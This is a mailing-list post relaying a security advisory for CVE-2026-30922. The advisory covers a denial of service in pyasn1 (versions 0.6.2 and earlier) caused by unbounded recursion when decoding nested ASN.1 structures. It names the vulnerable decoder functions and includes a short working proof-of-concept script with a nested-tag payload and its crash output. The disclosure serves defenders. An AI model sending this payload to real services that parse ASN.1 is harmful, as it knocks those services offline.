Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-ID: <466a5378-d9bc-4119-bc49-e0b1fd08b865@oracle.com>
Date: Fri, 20 Mar 2026 15:45:54 -0700
From: Alan Coopersmith <alan.coopersmith@...cle.com>
To: oss-security@...ts.openwall.com
Subject: [CVE-2026-30922] Denial of Service in pyasn1 via
 Unbounded Recursion

https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r reports:
> Package:                pyasn1 (pip)
> Affected versions:      <= 0.6.2
> Patched versions:       0.6.3
> 
> Summary
> -------
> The pyasn1 library is vulnerable to a Denial of Service (DoS) attack
> caused by uncontrolled recursion when decoding ASN.1 data with deeply
> nested structures. An attacker can supply a crafted payload containing
> nested SEQUENCE (0x30) or SET (0x31) tags with Indefinite Length
> (0x80) markers. This forces the decoder to recursively call itself
> until the Python interpreter crashes with a RecursionError or consumes
> all available memory (OOM), crashing the host application.
> 
> Details
> -------
> The vulnerability exists because the decoder iterates through the
> input stream and recursively calls decodeFun (the decoding callback)
> for every nested component found, without tracking or limiting the
> recursion depth.
> 
> Vulnerable Code Locations:
> 
>  1. indefLenValueDecoder (Line 998):
>     for component in decodeFun(substrate, asn1Spec, allowEoo=True, **options):
>     This method handles indefinite-length constructed types. It sits inside a
>     while True loop and recursively calls the decoder for every nested tag.
> 
>  2. valueDecoder (Lines 786 and 907):
>     for component in decodeFun(substrate, componentType, **options):
>     This method handles standard decoding when a schema is present.
>     It contains two distinct recursive calls that lack depth checks:
>     Line 786: Recursively decodes components of SEQUENCE or SET types.
>     Line 907: Recursively decodes elements of SEQUENCE OF or SET OF types.
> 
>  3. _decodeComponentsSchemaless (Line 661):
>     for component in decodeFun(substrate, **options):
>     This method handles decoding when no schema is provided.
> 
> In all three cases, decodeFun is invoked without passing a depth parameter or
> checking against a global MAX_ASN1_NESTING limit.
> 
> PoC
> ---
> import sys
> from pyasn1.codec.ber import decoder
> 
> sys.setrecursionlimit(100000)
> 
> print("[*] Generating Recursion Bomb Payload...")
> depth = 50_000
> chunk = b'\x30\x80'
> payload = chunk * depth
> 
> print(f"[*] Payload size: {len(payload) / 1024:.2f} KB")
> print("[*] Triggering Decoder...")
> 
> try:
>     decoder.decode(payload)
> except RecursionError:
>     print("[!] Crashed: Recursion Limit Hit")
> except MemoryError:
>     print("[!] Crashed: Out of Memory")
> except Exception as e:
>     print(f"[!] Crashed: {e}")
> 
> [*] Payload size: 9.77 KB
> [*] Triggering Decoder...
> [!] Crashed: Recursion Limit Hit
> 
> Impact
> ------
>  - This is an unhandled runtime exception that typically terminates the
>    worker process or thread handling the request. This allows a remote attacker
>    to trivially kill service workers with a small payload (<100KB), resulting in
>    a Denial of Service. Furthermore, in environments where recursion limits are
>    increased, this leads to server-wide memory exhaustion.
> 
>  - Service Crash: Any service using pyasn1 to parse untrusted ASN.1 data
>    (e.g., LDAP, SNMP, Kerberos, X.509 parsers) can be crashed remotely.
> 
>  - Resource Exhaustion: The attack consumes RAM linearly with the nesting depth.
>    A small payload (<200KB) can consume hundreds of megabytes of RAM or exhaust
>    the stack.
> 
> Credits
> -------
> Vulnerability discovered by Kevin Tu of TMIR at ByteDance.
> 
> Severity
> --------
> High
> 7.5 / 10
> CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
> 
> CVE ID
> ------
> CVE-2026-30922
> 
> Weaknesses
> ----------
> CWE-674
> 
> Credits
> -------
>     @romanticpragmatism Reporter

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.